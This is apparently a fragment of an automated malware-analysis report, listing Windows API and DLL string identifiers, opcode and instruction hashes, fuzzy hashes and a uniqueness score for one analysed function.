                                                                    • API ID: File$CreateLibraryLoadReadSleep
                                                                    • String ID: .dll$1$2$kernel32$ntdll.dll$user32.dllntdll.dll
                                                                    • API String ID: 1602266143-1375677587
                                                                    • Opcode ID: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                    • Instruction ID: c376729b955e4890ab21c7acb614fad369d8ad6d611b32426dccfa3656ca32b5
                                                                    • Opcode Fuzzy Hash: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                    • Instruction Fuzzy Hash: C08129B1D14208ABEB10DFE0CC49FEEBBBCEF44301F148059F915EA141E7749A859B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%